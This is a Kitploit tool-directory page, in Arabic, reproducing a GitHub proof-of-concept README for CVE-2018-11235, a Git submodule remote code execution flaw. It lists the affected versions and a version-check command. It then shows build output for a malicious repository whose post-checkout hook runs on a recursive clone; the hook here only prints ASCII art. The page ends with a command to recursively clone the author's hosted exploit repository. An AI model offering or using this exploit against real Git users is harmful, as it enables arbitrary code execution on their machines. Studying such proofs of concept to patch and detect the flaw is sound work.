Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-11235 — CVE-2018-11235(PoC && Exp) | Kitploit
أدوات/GitHubGitHub/anonymking/cve-2018-11235
تحليل الثغرات الأمنيةالاستغلالأمن سلسلة التوريدالتعلم والتعليماستغلال الملفات الثنائيةمختبرات وتدريب عملي
GitHubanonymking/cve-2018-11235

CVE-2018-11235

CVE-2018-11235(PoC && Exp)

عرض المستودع
14منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-11235

نظرة عامة على الثغرة

  • اسم الثغرة: ثغرة أمنية في Git
  • رقم CNNVD: CNNVD-201805-1020
  • مستوى الخطورة: عالي
  • رقم CVE: CVE-2018-11235
  • نوع الثغرة: مشكلة في ميزة الأمان
  • تاريخ الإصدار: 2018-05-31
  • نوع التهديد: عن بعد
  • تاريخ التحديث: 2019-04-01
  • البائع: git-scm
  • مصدر الثغرة:
  • ملخص الثغرة: Git هو نظام تحكم في الإصدارات موزع ومجاني ومفتوح المصدر تم تطويره بواسطة مطور البرامج الأمريكي لينوس تورفالدس (Linus Torvalds). يوجد ثغرة أمنية في Git تنشأ عن عدم التحقق الصحيح من أسماء الوحدات الفرعية من ملفات .gitmodules غير الموثوقة عند إضافة اسم الوحدة الفرعية إلى دليل $GIT_DIR/modules. يمكن للمهاجم عن بعد استغلال هذه الثغرة لتنفيذ تعليمات برمجية عشوائية باستخدام ملف .gitmodules معد خصيصًا. تتأثر الإصدارات التالية: Git قبل 2.13.7، و 2.14.x قبل 2.14.4، و 2.15.x قبل 2.15.2، و 2.16.x قبل 2.16.4، و 2.17.x قبل 2.17.1.
  • الإصدارات المتأثرة (مصدر: 《Git任意代码执行漏洞检测与修复(CVE-2018-11235)》):
root@kitploit:~
الإصدار 2.13.x، أقل من 2.13.7 به الثغرة
الإصدار 2.14.x، أقل من 2.14.4 به الثغرة
الإصدار 2.15.x، أقل من 2.15.2 به الثغرة
الإصدار 2.16.x، أقل من 2.16.4 به الثغرة
الإصدار 2.17.x، أقل من 2.17.1 به الثغرة
  • التحقق مما إذا كان إصدارك متأثرًا (مصدر: 《Git任意代码执行漏洞检测与修复(CVE-2018-11235)》):
root@kitploit:~
mkdir tmp && cd tmp
git init test && cd test && git update-index --add --cacheinfo 120000,e69de29bb2d1d6434b8b29ae775ad8c2e48c5391,.gitmodules
تنزيل الأداة
  1. إذا ظهرت Initialized empty Git repository in /tmp/test/.git/ فهذا يعني وجود الثغرة
  2. إذا ظهرت الجمل التالية، فهذا يعني أن الإصدار غير متأثر:
root@kitploit:~
Initialized empty Git repository in /tmp/test/.git/
error: Invalid path '.gitmodules'
fatal: git update-index: --cacheinfo cannot add .gitmodules

إعادة إنتاج الثغرة

  • بسبب مشاكل آلية الأمان في Github، لا يمكن رفع المشاريع الضارة، لذا يمكنك تشغيل السكريبت build.sh لبناء هذا المشروع محليًا للتعلم والاختبار.
  • يعتمد تنفيذ هذا المشروع بشكل أساسي على المشروعين CVE-2018-11235-DEMO و CVE-2018-11235
  • إصدار Git الذي استخدمته هو git-2.12.1
  • العملية والنتيجة كما يلي:
root@kitploit:~
[anonymking@localhost test]$ ./build.sh 
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule/.git/
[master (root-commit) 9bb1fad] submodule
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 hgt_blank
Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/.git/
Cloning into '/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/payload'...
done.
Cloning into '/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC/Submodule'...
done.
[master (root-commit) fcbf40f] CVE-2018-11235
 29 files changed, 560 insertions(+)
 create mode 100644 .gitmodules
 create mode 160000 Submodule
 create mode 100644 modules/1/2/3/4/payload/HEAD
 create mode 100644 modules/1/2/3/4/payload/config
 create mode 100644 modules/1/2/3/4/payload/description
 create mode 100755 modules/1/2/3/4/payload/hooks/applypatch-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/commit-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/post-checkout
 create mode 100755 modules/1/2/3/4/payload/hooks/post-update.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-applypatch.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-commit.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-push.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-rebase.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/pre-receive.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/prepare-commit-msg.sample
 create mode 100755 modules/1/2/3/4/payload/hooks/update.sample
 create mode 100644 modules/1/2/3/4/payload/index
 create mode 100644 modules/1/2/3/4/payload/info/exclude
 create mode 100644 modules/1/2/3/4/payload/logs/HEAD
 create mode 100644 modules/1/2/3/4/payload/logs/refs/heads/master
 create mode 100644 modules/1/2/3/4/payload/logs/refs/remotes/origin/HEAD
 create mode 100644 modules/1/2/3/4/payload/objects/0e/6d9b98b3face913a8ebf48f804d6c8fffba674
 create mode 100644 modules/1/2/3/4/payload/objects/9b/b1fad6c6e16340496f2cc0fec46c8159bfc693
 create mode 100644 modules/1/2/3/4/payload/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391
 create mode 100644 modules/1/2/3/4/payload/packed-refs
 create mode 100644 modules/1/2/3/4/payload/refs/heads/master
 create mode 100644 modules/1/2/3/4/payload/refs/remotes/origin/HEAD
 create mode 120000 modules/payload
 create mode 160000 payload
git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC" des_dir
[anonymking@localhost test]$ 
[anonymking@localhost test]$ 
[anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-11235-PoC/CVE-2018-11235-PoC" test
Cloning into 'test'...
done.
Submodule 'Submodule' (/home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule) registered for path 'Submodule'
Submodule '../../modules/payload' (/home/anonymking/Desktop/test/CVE-2018-11235-PoC/Submodule) registered for path 'payload'
Cloning into '/home/anonymking/Desktop/test/test/Submodule'...
done.
Submodule path 'Submodule': checked out '9bb1fad6c6e16340496f2cc0fec46c8159bfc693'


*********************************************
                   _ooOoo_
                  o8888888o
                  88" . "88
                  (| -_- |)
                  O\  =  /O
               ____/`---'\____
             .'  \\|     |//  `.
            /  \\|||  :  |||//  \
           /  _||||| -:- |||||-  \
           |   | \\\  -  /// |   |
           | \_|  ''\---/''  |   |
           \  .-\__  `-`  ___/-. /
         ___`. .'  /--.--\  `. . __
      ."" '<  `.___\_<|>_/___.'  >'"".
     | | :  `- \`.;`\ _ /`;.`/ - ` : | |
     \  \ `-.   \_ __\ /__ _/   .-` /  /
======`-.____`-.___\_____/___.-`____.-'======
                   `=---='
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Submodule path 'payload': checked out '9bb1fad6c6e16340496f2cc0fec46c8159bfc693'
  • الكود الضار الذي بنيته في الـ payload هو مجرد طباعة بوذا، لذا فإن رؤية بوذا تعني نجاح الاختبار.

المراجع

  1. http://lkml.iu.edu/hypermail/linux/kernel/1805.3/05909.html
  2. https://www.anquanke.com/post/id/146909
  3. https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/
  4. https://xz.aliyun.com/t/2371
  5. https://github.com/CHYbeta/CVE-2018-11235-DEMO
  6. https://atorralba.github.io/CVE-2018-11235/
  7. https://github.com/Rogdham/CVE-2018-11235

اكتشاف غير متوقع

  • لقد نجحت في بناء هذا المشروع على Coding — CVE-2018-11235
  • طريقة الاستخدام:
root@kitploit:~
git clone --recursive https://git.dev.tencent.com/anonymking/CVE-2018-11235.git test